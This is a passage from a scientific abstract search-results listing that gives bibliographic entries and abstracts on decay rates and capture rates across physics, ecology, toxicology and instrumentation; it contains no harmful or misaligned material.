decays ALEPH Collaboration; Heister, A.; Schael, S.; Barate, R.; Brunelière, R.; de Bonis, I.; Decamp, D.; Goy, C.; Jezequel, S.; Lees, J.-P.; Martin, F.; Merle, E.; Minard, M.-N.; Pietrzyk, B.; Trocmé, B.; Bravo, S.; Casado, M. P.; Chmeissani, M.; Crespo, J. M.; Fernandez, E.; Fernandez-Bosman, M.; Garrido, Ll.; Martinez, M.; Pacheco, A.; Ruiz, H.; Colaleo, A.; Creanza, D.; de Filippis, N.; de Palma, M.; Iaselli, G.; Maggi, G.; Maggi, M.; Nuzzo, S.; Ranieri, A.; Raso, G.; Ruggieri, F.; Selvaggi, G.; Silvestris, L.; Tempesta, P.; Tricomi, A.; Zito, G.; Huang, X.; Lin, J.; Ouyang, Q.; Wang, T.; Xie, Y.; Xu, R.; Xue, S.; Zhang, J.; Zhang, L.; Zhao, W.; Abbaneo, D.; Barklow, T.; Buchmüller, O.; Cattaneo, M.; Cerutti, F.; Clerbaux, B.; Drevermann, H.; Forty, R. W.; Frank, M.; Gianotti, F.; Hansen, J. B.; Harvey, J.; Hutchcroft, D. E.; Janot, P.; Jost, B.; Kado, M.; Mato, P.; Moutoussi, A.; Ranjard, F.; Rolandi, L.; Schlatter, D.; Sguazzoni, G.; Tejessy, W.; Teubert, F.; Valassi, A.; Videau, I.; Badaud, F.; Dessagne, S.; Falvard, A.; Fayolle, D.; Gay, P.; Jousset, J.; Michel, B.; Monteil, S.; Pallin, D.; Pascolo, J. M.; Perret, P.; Hansen, J. D.; Hansen, J. R.; Hansen, P. H.; Kraan, A.; Nilsson, B. S.; Kyriakis, A.; Markou, C.; Simopoulou, E.; Vayaki, A.; Zachariadou, K.; Blondel, A.; Brient, J.-C.; Machefert, F.; Rougé, A.; Swynghedauw, M.; Tanaka, R.; Videau, H.; Ciulli, V.; Focardi, E.; Parrini, G.; Antonelli, A.; Antonelli, M.; Bencivenni, G.; Bossi, F.; Capon, G.; Chiarella, V.; Laurelli, P.; Mannocchi, G.; Murtas, G. P.; Passalacqua, L.; Kennedy, J.; Lynch, J. G.; Negus, P.; O'Shea, V.; Thompson, A. S.; Wasserbaech, S.; Cavanaugh, R.; Dhamotharan, S.; Geweniger, C.; Hanke, P.; Hepp, V.; Kluge, E. E.; Leibenguth, G.; Putzer, A.; Stenzel, H.; Tittel, K.; Wunsch, M.; Beuselinck, R.; Cameron, W.; Davies, G.; Dornan, P. J.; Girone, M.; Hill, R. D.; Marinelli, N.; Nowell, J.; Rutherford, S. A.; Sedgbeer, J. K.; Thompson, J. C.; White, R.; Ghete, V. M.; Girtler, P.; Kneringer, E.; Kuhn, D.; Rudolph, G.; Bouhova-Thacker, E.; Bowdery, C. K.; Clarke, D. P.; Ellis, G.; Finch, A. J.; Foster, F.; Hughes, G.; Jones, R. W. L.; Pearson, M. R.; Robertson, N. A.; Smizanska, M.; van der Aa, O.; Delaere, C.; Lemaitre, V.; Blumenschein, U.; Hölldorfer, F.; Jakobs, K.; Kayser, F.; Kleinknecht, K.; Müller, A.-S.; Renk, B.; Sander, H.-G.; Schmeling, S.; Wachsmuth, H.; Zeitnitz, C.; Ziegler, T.; Bonissent, A.; Coyle, P.; Curtil, C.; Ealet, A.; Fouchez, D.; Payre, P.; Tilquin, A.; Ragusa, F.; David, A.; Dietl, H.; Ganis, G.; Hüttmann, K.; Lütjens, G.; Männer, W.; Moser, H.-G.; Settles, R.; Villegas, M.; Wolf, G.; Boucrot, J.; Callot, O.; Davier, M.; Duflot, L.; Grivaz, J.-F.; Heusse, Ph.; Jacholkowska, A.; Serin, L.; Veillet, J.-J.; Azzurri, P.; Bagliesi, G.; Boccali, T.; Foà, L.; Giammanco, A.; Giassi, A.; Ligabue, F.; Messineo, A.; Palla, F.; Sanguinetti, G.; Sciabà, A.; Spagnolo, P.; Tenchini, R.; Venturi, A.; Verdini, P. G.; Awunor, O.; Blair, G. A.; Cowan, G.; Garcia-Bellido, A.; Green, M. G.; Jones, L. T.; Medcalf, T.; Misiejuk, A.; Strong, J. A.; Teixeira-Dias, P.; Clifft, R. W.; Edgecock, T. R.; Norton, P. R.; Tomalin, I. R.; Ward, J. J.; Bloch-Devaux, B.; Boumediene, D.; Colas, P.; Fabbro, B.; Lançon, E.; Lemaire, M.-C.; Locci, E.; Perez, P.; Rander, J.; Tuchming, B.; Vallage, B.; Konstantinidis, N.; Litke, A. M.; Taylor, G.; Booth, C. N.; Cartwright, S.; Combley, F.; Hodgson, P. N.; Lehto, M.; Thompson, L. F.; Böhrer, A.; Brandt, S.; Grupen, C.; Hess, J.; Ngac, A.; Prange, G.; Borean, C.; Giannini, G.; He, H.; Putz, J.; Rothberg, J.; Armstrong, S. R.; Berkelman, K.; Cranmer, K.; Ferguson, D. P. S.; Gao, Y.; González, S.; Hayes, O. J.; Hu, H.; Jin, S.; Kile, J.; McNamara, P. A.; Nielsen, J.; Pan, Y. B.; von Wimmersperg-Toeller, J. H.; Wiedenmann, W.; Wu, J.; Wu, Sau Lan; Wu, X.; Zobernig, G.; Dissertori, G. 2003-05-01 The rate of gluon splitting into /cc¯ pairs in hadronic Z decays is measured using the data sample collected by ALEPH from 1991 to 1995. The selection is based on the identification of leptons (electrons and muons) originating from semileptonic charm decays, and on the topological properties of signal events. The result derived from the selected sample is gcc¯=(3.26+/-0.23(stat)+/-0.42(syst))%. 3. Hawking-Moss Bounces and Vacuum Decay Rates SciTech Connect Weinberg, Erick J. 2007-06-22 The conventional interpretation of the Hawking-Moss (HM) solution implies a transition rate between vacua that depends only on the values of the potential in the initial vacuum and at the top of a potential barrier, leading to the implausible conclusion that transitions to distant vacua can be as likely as those to a nearby one. I analyze this issue using a nongravitational example with analogous properties. I show that such HM bounces do not give reliable rate calculations, but are instead related to the probability of finding a quasistable configuration at a local potential maximum. 4. Evidence from Voyager and ISEE-3 spacecraft. Data for the decay of secondary K-electron capture isotopes during the propagation of cosmic rays in the Galaxy Soutoul, A.; Legrain, R.; Lukasiak, A.; McDonald, F. B.; Webber, W. R. 1998-08-01 New data from the cosmic ray experiment on the Voyager spacecraft confirms and extends earlier data from a similar experiment on the ISEE-3 spacecraft which indicates the possibility of the decay of certain K-capture isotopes during the interstellar propagation of galactic cosmic rays. These cosmic ray measurements, along with the cross section measurements, indicate that ~ 25% of the K-capture isotopes (51Cr and (49V produced as secondaries have decayed at interstellar energy of ~ 400 MeV/nuc. This suggests a possible interstellar energy gain ~ 100 MeV/nuc out of the current interstellar energy ~ 500 MeV/nuc. This measurement suggests that the study of the K-capture isotopes may now have reached a level that will soon provide definitive information on the amount of re-acceleration that may occur during cosmic-ray propagation after an initial acceleration in the cosmic ray sources. 5. Comparative capture rate responses of mosquito vectors to light trap and human landing collection methods USDA-ARS?s Scientific Manuscript database Landing rates (LR) of female Anopheles quadrimaculatus, Culex nigripalpus, Cx. quinquefasciatus, Ochlerotatus triseriatus and Aedes albopictus on human hosts were compared with capture rates responses by the same species to CDC-type light traps (LT) augmented with CO2. A significant relationship be... 6. Short term memory bowing effect is consistent with presentation rate dependent decay. PubMed Tarnow, Eugen 2010-12-01 I reanalyze the free recall data of Murdock, J Exp Psychol 64(5):482-488 (1962) and Murdock and Okada, J Verbal Learn and Verbal Behav 86:263-267 (1970) which show the famous bowing effect in which initial and recent items are recalled better than intermediate items (primacy and recency effects). Recent item recall probabilities follow a logarithmic decay with time of recall consistent with the tagging/retagging theory. The slope of the decay increases with increasing presentation rate. The initial items, with an effectively low presentation rate, decay with the slowest logarithmic slope, explaining the primacy effect. The finding that presentation rate limits the duration of short term memory suggests a basis for memory loss in busy adults, for the importance of slow music practice, for long term memory deficiencies for people with attention deficits who may be artificially increasing the presentation rates of their surroundings. A well-defined, quantitative measure of the primacy effect is introduced. 7. Geometrical scaling and modal decay rates in periodic arrays of deeply subwavelength Terahertz resonators SciTech Connect 2014-12-21 It is well known that due to the high conductivity of noble metals at terahertz frequencies and scalability of macroscopic Maxwell equations, a geometrical downscaling of a terahertz resonator results in the linear upscaling of its resonance frequency. However, the scaling laws of modal decay rates, important for the resonator excitation efficiency, are much less known. Here, we investigate the extent to which the scale-invariance of decay rates is violated due to the finite conductivity of the metal. We find that the resonance quality factor or the excitation efficiency may be substantially affected by scaling and show that this happens as a result of the scale-dependence of the metal absorption rate, while the radiative decay and the dielectric cavity absorption rates are approximately scale-invariant. In particular, we find that by downscaling overcoupled resonators, their excitation efficiency increases, while the opposite happens with undercoupled resonators. 8. Relativistic quasiparticle random-phase approximation calculation of total muon capture rates SciTech Connect Marketin, T.; Paar, N.; Niksic, T.; Vretenar, D. 2009-05-15 The relativistic proton-neutron quasiparticle random phase approximation (pn-RQRPA) is applied in the calculation of total muon capture rates on a large set of nuclei from {sup 12}C to {sup 244}Pu, for which experimental values are available. The microscopic theoretical framework is based on the relativistic Hartree-Bogoliubov (RHB) model for the nuclear ground state, and transitions to excited states are calculated using the pn-RQRPA. The calculation is fully consistent, i.e., the same interactions are used both in the RHB equations that determine the quasiparticle basis, and in the matrix equations of the pn-RQRPA. The calculated capture rates are sensitive to the in-medium quenching of the axial-vector coupling constant. By reducing this constant from its free-nucleon value g{sub A}=1.262 by 10% for all multipole transitions, the calculation reproduces the experimental muon capture rates to better than 10% accuracy. 9. Beyond the bucket: testing the effect of experimental design on rate and sequence of decay Gabbott, Sarah; Murdock, Duncan; Purnell, Mark 2016-04-01 Experimental decay has revealed the potential for profound biases in our interpretations of exceptionally preserved fossils, with non-random sequences of character loss distorting the position of fossil taxa in phylogenetic trees. By characterising these sequences we can rewind this distortion and make better-informed interpretations of the affinity of enigmatic fossil taxa. Equally, rate of character loss is crucial for estimating the preservation potential of phylogentically informative characters, and revealing the mechanisms of preservation themselves. However, experimental decay has been criticised for poorly modeling 'real' conditions, and dismissed as unsophisticated 'bucket science'. Here we test the effect of a differing experimental parameters on the rate and sequence of decay. By doing so, we can test the assumption that the results of decay experiments are applicable to informing interpretations of exceptionally preserved fossils from diverse preservational settings. The results of our experiments demonstrate the validity of using the sequence of character loss as a phylogenetic tool, and sheds light on the extent to which environment must be considered before making decay-informed interpretations, or reconstructing taphonomic pathways. With careful consideration of experimental design, driven by testable hypotheses, decay experiments are robust and informative - experimental taphonomy needn't kick the bucket just yet. 10. Precision decay rate calculations in quantum field theory Andreassen, Anders; Farhi, David; Frost, William; Schwartz, Matthew D. 2017-04-01 Tunneling in quantum field theory is worth understanding properly, not least because it controls the long-term fate of our Universe. There are, however, a number of features of tunneling rate calculations which lack a desirable transparency, such as the necessity of analytic continuation, the appropriateness of using an effective instead of classical potential, and the sensitivity to short-distance physics. This paper attempts to review in pedagogical detail the physical origin of tunneling and its connection to the path integral. Both the traditional potential-deformation method and a recent, more direct, propagator-based method are discussed. Some new insights from using approximate semiclassical solutions are presented. In addition, we explore the sensitivity of the lifetime of our Universe to short-distance physics, such as quantum gravity, emphasizing a number of important subtleties. 11. Coordinate-dependent diffusion coefficients: Decay rate in open quantum systems SciTech Connect Sargsyan, V. V.; Palchikov, Yu. V.; Antonenko, N. V.; Kanokov, Z.; Adamian, G. G. 2007-06-15 Based on a master equation for the reduced density matrix of an open quantum collective system, the influence of coordinate-dependent microscopical diffusion coefficients on the decay rate from a metastable state is treated. For various frictions and temperatures larger than a crossover temperature, the quasistationary decay rates obtained with the coordinate-dependent microscopical set of diffusion coefficients are compared with those obtained with the coordinate-independent microscopical set of diffusion coefficients and coordinate-independent and -dependent phenomenological sets of diffusion coefficients. Neglecting the coordinate dependence of diffusion coefficients, one can strongly overestimate or underestimate the decay rate at low temperature. The coordinate-dependent phenomenological diffusion coefficient in momentum are shown to be suitable for applications. 12. Best rates of decay for coupled waves with different propagation speeds Oquendo, Higidio Portillo; Raya, Raul Prado 2017-08-01 We consider an abstract system of two coupled evolution equations. One of these equations has an internal damping, and the other is simply elastic. When both equations have the same propagation speed, Alabau et al. (J Evol Equ 2:127-150, 2002) showed that the semigroup of this system decays polynomially in time with the rate t^{-1/2}. In this work, we consider this coupled system when the propagation speeds of the equations are different, and we study the asymptotic behavior of the semigroup. For this case, we show that the semigroup still decays polynomially with a slower rate as t^{-1/4}. Moreover, we prove that this rate of decay is the best. 13. Change in decay rates of dioxin-like compounds in Yusho patients. PubMed Matsumoto, Shinya; Akahane, Manabu; Kanagawa, Yoshiyuki; Kajiwara, Jumboku; Mitoma, Chikage; Uchi, Hiroshi; Furue, Masutaka; Imamura, Tomoaki 2016-09-07 Once ingested, dioxins and dioxin-like compounds are excreted extremely slowly. Excretion can be evaluated by its half-life. Half-lives estimated from observed concentrations are affected by excretion and ongoing exposure. We investigated the change in apparent half-life using a theoretical model based on exposure to dioxin and dioxin-like compounds. We carried out longitudinal measurements of the blood concentration of dioxins and dioxin-like compounds in a Yusho cohort during 2002 to 2010. We estimated the change in decay rates of 2,3,4,7,8-PeCDF and octachlorodibenzodioxin (OCDD) using a second-order equation. We found that the decay rate of OCDD increased, whereas the decay rate of 2,3,4,7,8-PeCDF of patients with a relatively high concentration of 2,3,4,7,8-PeCDF decreased. OCDD results were in accordance with decreasing levels of dioxin and dioxin-like compounds in the environment. The decay rate of OCDD in the body was affected by the decay rate of OCDD in the environment by ingestion because it was near the steady-state. In contrast, the decay rate of 2,3,4,7,8-PeCDF in the body was affected less by ingestion from the environment because it was far higher than in the steady-state. We demonstrated that the level of 2,3,4,7,8-PeCDF in the environment is decreasing. The excretion half-life is longer than the environmental half-life, thus the excretion half-life in a Yusho patient is increased. 14. Neutrino energy loss rates and positron capture rates on {sup 55}Co for presupernova and supernova physics SciTech Connect 2008-05-15 Proton-neutron quasiparticle random phase approximation (pn-QRPA) theory has recently been used for the calculation of stellar weak interaction rates of the fp-shell nuclide with success. Neutrino losses from protoneutron stars play a pivotal role in deciding if these stars would be crushed into black holes or explode as supernovas. The product of abundance and positron capture rates on {sup 55}Co is substantial and as such can play a role in the fine tuning of input parameters of simulation codes especially in the presupernova evolution. Recently we introduced our calculation of capture rates on {sup 55}Co, in a luxurious model space of 7({Dirac_h}/2{pi}) {omega}, employing the pn-QRPA theory with a separable interaction. Simulators, however, may require these rates on a fine scale. Here we present for the first time an expanded calculation of the neutrino energy loss rates and positron capture rates on {sup 55}Co on an extensive temperature-density scale. This type of scale is appropriate for interpolation purposes and of greater utility for simulation codes. The pn-QRPA calculated neutrino energy loss rates are enhanced roughly up to two orders of magnitude compared with the large-scale shell model calculations and favor a lower entropy for the core of massive stars. 15. Design of cycler trajectories and analysis of solar influences on radioactive decay rates during space missions Rogers, Blake A. This thesis investigates the design of interplanetary missions for the continual habitation of Mars via Earth-Mars cyclers and for the detection of variations in nuclear decay rates due to solar influences. Several cycler concepts have been proposed to provide safe and comfortable quarters for astronauts traveling between the Earth and Mars. However, no literature has appeared to show how these massive vehicles might be placed into their cycler trajectories. Trajectories are designed that use either Vinfinity leveraging or low thrust to establish cycler vehicles in their desired orbits. In the cycler trajectory cases considered, the use of Vinfinity leveraging or low thrust substantially reduces the total propellant needed to achieve the cycler orbit compared to direct orbit insertion. In the case of the classic Aldrin cycler, the propellant savings due to Vinfinity leveraging can be as large as a 24 metric ton reduction for a cycler vehicle with a dry mass of 75 metric tons, and an additional 111 metric ton reduction by instead using low thrust. The two-synodic period cyclers considered benefit less from Vinfinity leveraging, but have a smaller total propellant mass due to their lower approach velocities at Earth and Mars. It turns out that, for low-thrust establishment, the propellant required is approximately the same for each of the cycler trajectories. The Aldrin cycler has been proposed as a transportation system for human missions between Earth and Mars. However, the hyperbolic excess velocity values at the planetary encounters for these orbits are infeasibly large, especially at Mars. In a new version of the Aldrin cycler, low thrust is used in the interplanetary trajectories to reduce the encounter velocities. Reducing the encounter velocities at both planets reduces the propellant needed by the taxis (astronauts use these taxis to transfer between the planetary surfaces and the cycler vehicle) to perform hyperbolic rendezvous. While the propellant 16. Backstepping approach to the arbitrary decay rate for Euler-Bernoulli beam under boundary feedback Guo, Bao-Zhu; Jin, Feng-Fei 2010-10-01 In this article, we are concerned with the boundary stabilisation of the Euler-Bernoulli beam equation for which all eigenvalues of the (control) free system are located on the imaginary axis of the complex plane. The fourth-order system in spacial variable is transformed into a coupled heat-like system. This enables us to make a natural backstepping transformation in vector form to transform the system into a target system which has arbitrary decay rate. The state feedback is thus designed. It is shown that the original closed-loop system is exponentially stable with the given arbitrary decay rate. 17. Fluorescence decay rate statistics of a single molecule in a disordered cluster of nanoparticles SciTech Connect Froufe-Perez, L. S.; Carminati, R.; Saenz, J. J. 2007-07-15 The statistical properties of the fluorescence lifetime of single emitters in disordered systems are discussed. The contribution of radiative and nonradiative processes to the spontaneous decay rate is analyzed using a simple analytical model, in full agreement with exact numerical simulations. The relative fluctuations of the decay rate are shown to exhibit two well-defined regimes dominated either by near-field scattering or by absorption processes. In both regimes, the averaged apparent quantum yield remains high enough to permit practical measurements. Lifetime fluctuations could thus be used a probe of the local environment in complex systems at the nanometer scale. 18. Constraints on the η η' decay rate of a scalar glueball from gauge/gravity duality Brünner, Frederic; Rebhan, Anton 2015-12-01 Predictions of glueball decay rates in the holographic Witten-Sakai-Sugimoto model for low-energy QCD can be uniquely extended to include finite quark masses up to an as-yet-undetermined parameter in the coupling of glueballs to the nonanomalous part of the pseudoscalar mass terms. The assumption of a universal coupling of glueballs to mass terms of the full nonet of pseudoscalar mesons leads to flavor asymmetries in the decay rates of scalar glueballs that agree well with experimental data for the glueball candidate f0(1710 ) and implies a vanishing decay rate into η η' pairs, for which only upper bounds for the f0(1710 ) meson are known at present from experiment. Relaxing this assumption, the holographic model gives a tight correlation between the decay rates into pairs of pseudo-Goldstone bosons of the same type and η η' pairs. If Γ (G →K K )/Γ (G →π π ) is kept within the range reported currently by the Particle Data Group for the f0(1710 ) meson, the rate Γ (G →η η')/Γ (G →π π ) is predicted to be ≲0.04 . The corresponding situation for f0(1500 ) is also discussed; however, this is found to be much less compatible with the interpretation of a largely unmixed glueball. 19. Comparative capture rate responses of mosquito vectors to light trap and human landing collection methods USDA-ARS?s Scientific Manuscript database Capture rate responses of female Aedes albopictus Skuse, Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, Culex quinquefasciatus Say, and Ochlerotatus triseriatus (Wiedemann) to CDC-type light trap (LT) and human landing (HL) collection methods were observed and evaluated for congruency wi... 20. Evidence for correlations between fluctuations in 54Mn decay rates and solar storms Mohsinally, T.; Fancher, S.; Czerny, M.; Fischbach, E.; Gruenwald, J. T.; Heim, J.; Jenkins, J. H.; Nistor, J.; O'Keefe, D. 2016-02-01 Following recent indications that several radioactive isotopes show fluctuating decay rates which may be influenced by solar activity, we present findings from a 2 year period of data collection on 54Mn. Measurements were recorded hourly from a 1 μCi sample of 54Mn monitored from January 2010-December 2011. A series of signal-detection algorithms determine regions of statistically significant fluctuations in decay behaviour from the expected exponential form. The 239 decay flags identified during this interval were compared to daily distributions of multiple solar indices, generated by NOAA, which are associated with heightened solar activity. The indices were filtered to provide a list of the 413 strongest events during a coincident period. We find that 49% of the strongest solar events are preceded by at least 1 decay flag within a 48 h interval, and 37% of decay flags are followed by a reported solar event within 48 h. These results are significant at the 0.9σ and 2.8σ levels respectively, based on a comparison to results obtained from a shuffle test, in which the decay measurements were randomly shuffled in time 10,000 times. We also present results from a simulation combining constructed data reflecting 10 sites which compared and filtered decay flags generated from all sites. The results indicate a potential 35% reduction in the false positive rate in going from 1 to 10 sites. By implication, the improved statistics attest to the benefit of analysing data from a larger number of geographically distributed sites in parallel. 1. Blackbody-induced decay, excitation and ionization rates for Rydberg states in hydrogen and helium atoms Glukhov, I. L.; Nekipelov, E. A.; Ovsiannikov, V. D. 2010-06-01 New features of the blackbody-induced radiation processes on Rydberg atoms were discovered on the basis of numerical data for the blackbody-induced decay Pdnl(T), excitation Penl(T) and ionization Pionnl(T) rates of nS, nP and nD Rydberg states calculated together with the spontaneous decay rates Pspnl in neutral hydrogen, and singlet and triplet helium atoms for some values of the principal quantum number n from 10 to 500 at temperatures from T = 100 K to 2000 K. The fractional rates Rd(e, ion)nl(T) = Pnld(e, ion)(T)/Pspnl equal to the ratio of the induced decay (excitation, ionization) rates to the rate of spontaneous decay were determined as functions of T and n in every series of states with a given angular momentum l = 0, 1, 2. The calculated data reveal an essential difference between the asymptotic dependence of the ionization rate Pionnl(T) and the rates of decay and excitation Pd(e)nl(T)~T/n2. The departures appear in each Rydberg series for n > 100 and introduce appreciable corrections to the formula of Cooke and Gallagher. Two different approximation formulae are proposed on the basis of the numerical data, one for Rd(e)nl(T) and another one for Rionnl(T), which reproduce the calculated values in wide ranges of principal quantum number from n = 10 to 1000 and temperatures between T = 100 K and T = 2000 K with an accuracy of 2% or better. Modified Fues' model potential approach was used for calculating matrix elements of bound-bound and bound-free radiation transitions in helium. 2. Designing screening protocols for amphibian disease that account for imperfect and variable capture rates of individuals. PubMed Canessa, Stefano; Martel, An; Pasmans, Frank 2014-07-01 The amphibian chytrid fungus, Batrachochytrium dendrobatidis, is one of the main factors in global amphibian decline. Accurate knowledge of its presence and prevalence in an area is needed to trigger conservation actions. However, imperfect capture rates determine the number of individuals caught and tested during field surveys, and contribute to the uncertainty surrounding estimates of prevalence. Screening programs should be planned with the objective of minimizing such uncertainty. We show how this can be achieved by using predictive models that incorporate information about population size and capture rates. Using as a case study an existing screening program for three populations of the yellow-bellied toad (Bombina variegata pachypus) in northern Italy, we sought to quantify the effect of seasonal variation in individual capture rates on the uncertainty surrounding estimates of chytrid prevalence. We obtained estimates of population size and capture rates from mark-recapture data, and found wide seasonal variation in the individual recapture rates. We then incorporated this information in a binomial model to predict the estimates of prevalence that would be obtained by sampling at different times in the season, assuming no infected individuals were found. Sampling during the period of maximum capture probability was predicted to decrease upper 95% credible intervals by a maximum of 36%, compared with least suitable periods, with greater gains when using uninformative priors. We evaluated model predictions by comparing them with the results of screening surveys in 2012. The observed results closely matched the predicted figures for all populations, suggesting that this method can be reliably used to maximize the sampling size of surveillance programs, thus improving their efficiency. 3. False vacuum transitions —Analytical solutions and decay rate values Correa, R. A. C.; Moraes, P. H. R. S.; da Rocha, Roldão 2015-08-01 In this work we show a class of oscillating configurations for the evolution of the domain walls in Euclidean space. The solutions are obtained analytically. Phase transitions are achieved from the associated fluctuation determinant, by the decay rates of the false vacuum. 4. Stochastic stability of a class of unbounded delay neutral stochastic differential equations with general decay rate Hu, Yangzi; Wu, Fuke; Huang, Chengming 2012-02-01 Without the linear growth condition on the drift coefficient, this article examines the existence and uniqueness of global solutions of a class of neutral stochastic differential equations with unbounded delay and their asymptotic stabilities with general decay rate. To illustrate the application of our results, this article gives a two-dimensional system as an example. 5. O(alpha{sup 3} ln alpha) Corrections to Positronium Decay Rates SciTech Connect Melnikov, Kirill 2001-07-25 We compute O ({alpha}{sup 3} ln {alpha}) corrections to the decay rates of para- and orthopositronium into two and three photons, respectively. For this calculation we employ the nonrelativistic QED regularized dimensionally and we explain how in this framework the logarithms of the fine structure constant can be extracted. 6. Estimate Of The Decay Rate Constant of Hydrogen Sulfide Generation From Landfilled Drywall EPA Science Inventory Research was conducted to investigate the impact of particle size on H2S gas emissions and estimate a decay rate constant for H2S gas generation from the anaerobic decomposition of drywall. Three different particle sizes of regular drywall and one particle size of paperless drywa... 7. Estimate Of The Decay Rate Constant of Hydrogen Sulfide Generation From Landfilled Drywall EPA Science Inventory Research was conducted to investigate the impact of particle size on H2S gas emissions and estimate a decay rate constant for H2S gas generation from the anaerobic decomposition of drywall. Three different particle sizes of regular drywall and one particle size of paperless drywa... 8. First measurements of muon production rate using a novel pion capture system at MuSIC Cook, S.; D'Arcy, R.; Fukuda, M.; Hatanaka, K.; Hino, Y.; Kuno, Y.; Lancaster, M.; Mori, Y.; Nam, T. H.; Ogitsu, T.; Sakamoto, H.; Sato, A.; Truong, N. M.; Yamamoto, A.; Yoshida, M.; Wing, M. 2013-02-01 The MuSIC (Muon Science Innovative Channel) beam line at RCNP (Research Centre for Nuclear Physics), Osaka will be the most intense source of muons in the world. A proton beam is incident on a target and, by using a novel capture solenoid, guides the produced pions into the beam line where they subsequently decay to muons. This increased muon flux will allow more precise measurements of cLFV (charged Lepton Flavour Violation) as well as making muon beams more economically feasible. Currently the first 36° of solenoid beam pipe have been completed and installed for testing with low proton current of 1 nA. Measurements of the total particle flux and the muon life time were made. The measurements were taken using thin plastic scintillators coupled to MPPCs (Multi-Pixel Photon Counter) that surrounded a magnesium or copper stopping target. The scintillators were used to record which particles stopped and their subsequent decay times giving a muon yield of 8.5 × 105 muons W-1proton beam or 3 × 108 muons s-1 when using the RCNP's full power (400 W). 9. Configuration splitting and gamma-decay transition rates in the two-group shell model SciTech Connect Isakov, V. I. 2015-09-15 Expressions for reduced gamma-decay transition rates were obtained on the basis of the twogroup configuration model for the case of transitions between particles belonging to identical groups of nucleons. In practical applications, the present treatment is the most appropriate for describing decays for odd–odd nuclei in the vicinity of magic nuclei or for nuclei where the corresponding subshells stand out in energy. Also, a simple approximation is applicable to describing configuration splitting in those cases. The present calculations were performed for nuclei whose mass numbers are close to A ∼ 90, including N = 51 odd—odd isotones. 10. The rate of decay of fresh fission products from a nuclear reactor Dolan, David J. Determining the rate of decay of fresh fission products from a nuclear reactor is complex because of the number of isotopes involved, different types of decay, half-lives of the isotopes, and some isotopes decay into other radioactive isotopes. Traditionally, a simplified rule of 7s and 10s is used to determine the dose rate from nuclear weapons and can be to estimate the dose rate from fresh fission products of a nuclear reactor. An experiment was designed to determine the dose rate with respect to time from fresh fission products of a nuclear reactor. The experiment exposed 0.5 grams of unenriched Uranium to a fast and thermal neutron flux from a TRIGA Research Reactor (Lakewood, CO) for ten minutes. The dose rate from the fission products was measured by four Mirion DMC 2000XB electronic personal dosimeters over a period of six days. The resulting dose rate following a rule of 10s: the dose rate of fresh fission products from a nuclear reactor decreases by a factor of 10 for every 10 units of time. 11. Capture locations and growth rates of Atlantic sturgeon in the Chesapeake Bay USGS Publications Warehouse Welsh, S.A.; Eyler, S.M.; Mangold, M.F.; Spells, A.J. 2002-01-01 Little information exists on temporal and spatial distributions of wild and hatchery-reared Atlantic sturgeon Acipenser oxyrinchus oxyrinchus in the Chesapeake Bay. Approximately 3,300 hatchery-reared Atlantic sturgeon comprised of two size groups were released into the Nanticoke River, a tributary of the Chesapeake Bay, on 8 July 1996. During January 1996-May 2000, 1099 Atlantic sturgeon were captured incidentally (i.e., bycatch) by commercial watermen in the Chesapeake Bay, including 420 hatchery-reared individuals. Wild and hatchery-reared Atlantic sturgeon were captured primarily in pound nets and gill nets. Biologists tagged each fish and recorded weight, length, and location of capture. Although two adults greater than 2000 mm fork length (FL) were captured in Maryland waters, wild sturgeon were primarily juveniles from Maryland and Virginia waters (415 and 259 individuals below 1000 mm FL, respectively). A growth rate of 0.565 mm/d (N = 15, SE = 0.081) was estimated for wild individuals (487-944 mm TL at release) at liberty from 30 to 622 d. The average growth of the group of hatchery-reared Atlantic sturgeon raised at 10??C exceeded that of the group raised at 17??C. Our distributional data based on capture locations are biased by fishery dependence and gear selectivity. These data are informative to managers, however, because commercial effort is widely distributed in the Chesapeake Bay, and little distributional data were available before this study. 12. Efficacy of trap modifications for increasing capture rates of aquatic snakes in floating aquatic funnel traps USGS Publications Warehouse Halstead, Brian J.; Wylie, Glenn D.; Casazza, Michael L. 2013-01-01 Increasing detection and capture probabilities of rare or elusive herpetofauna of conservation concern is important to inform the scientific basis for their management and recovery. The Giant Gartersnake (Thamnophis gigas) is an example of a secretive, wary, and generally difficult-to-sample species about which little is known regarding its patterns of occurrence and demography. We therefore evaluated modifications to existing traps to increase the detection and capture probabilities of the Giant Gartersnake to improve the precision with which occurrence, abundance, survival, and other demographic parameters are estimated. We found that adding a one-way valve constructed of cable ties to the small funnel opening of traps and adding hardware cloth extensions to the wide end of funnels increased capture rates of the Giant Gartersnake by 5.55 times (95% credible interval = 2.45–10.51) relative to unmodified traps. The effectiveness of these modifications was insensitive to the aquatic habitat type in which they were deployed. The snout-vent length of the smallest and largest captured snakes did not vary among trap modifications. These trap modifications are expected to increase detection and capture probabilities of the Giant Gartersnake, and show promise for increasing the precision with which demographic parameters can be estimated for this species. We anticipate that the trap modifications found effective in this study will be applicable to a variety of aquatic and semi-aquatic reptiles and amphibians and improve conservation efforts for these species. 13. Simple estimation of thermal capture rates for ion-dipole collisions by canonical effective potential methods Marković, Nikola; Nordholm, Sture 1989-07-01 Thermal capture rate coefficients are considered for collision partners which at long range interact by ion-dipole plus polarization potentials. The simple Langevin-Gioumousis-Stevenson theory is extended by mapping the true asymmetric multidimensional interaction potential onto an effective spherically symmetric potential obtained by analysis of canonical probability or flux equalities. Bound states are eliminated in the mapping as well as in the final rate coefficient. Capture rate coefficients are calculated for H 3+ ions colliding with HCl, CS and HCN in a model where the ion is represented as a point charge and the target as a diatomic molecule. Corresponding calculations are carried out using canonical variational transition state theory. The theoretical results are compared with corresponding results obtained in classical trajectory calculations wherein the diatomic target (HCl, CS or HCN) is modeled as two point charges. 14. High-Rate Data-Capture for an Airborne Lidar System NASA Technical Reports Server (NTRS) Valett, Susan; Hicks, Edward; Dabney, Philip; Harding, David 2012-01-01 A high-rate data system was required to capture the data for an airborne lidar system. A data system was developed that achieved up to 22 million (64-bit) events per second sustained data rate (1408 million bits per second), as well as short bursts (less than 4 s) at higher rates. All hardware used for the system was off the shelf, but carefully selected to achieve these rates. The system was used to capture laser fire, single-photon detection, and GPS data for the Slope Imaging Multi-polarization Photo-counting Lidar (SIMPL). However, the system has applications for other laser altimeter systems (waveform-recording), mass spectroscopy, xray radiometry imaging, high-background- rate ranging lidar, and other similar areas where very high-speed data capture is needed. The data capture software was used for the SIMPL instrument that employs a micropulse, single-photon ranging measurement approach and has 16 data channels. The detected single photons are from two sources those reflected from the target and solar background photons. The instrument is non-gated, so background photons are acquired for a range window of 13 km and can comprise 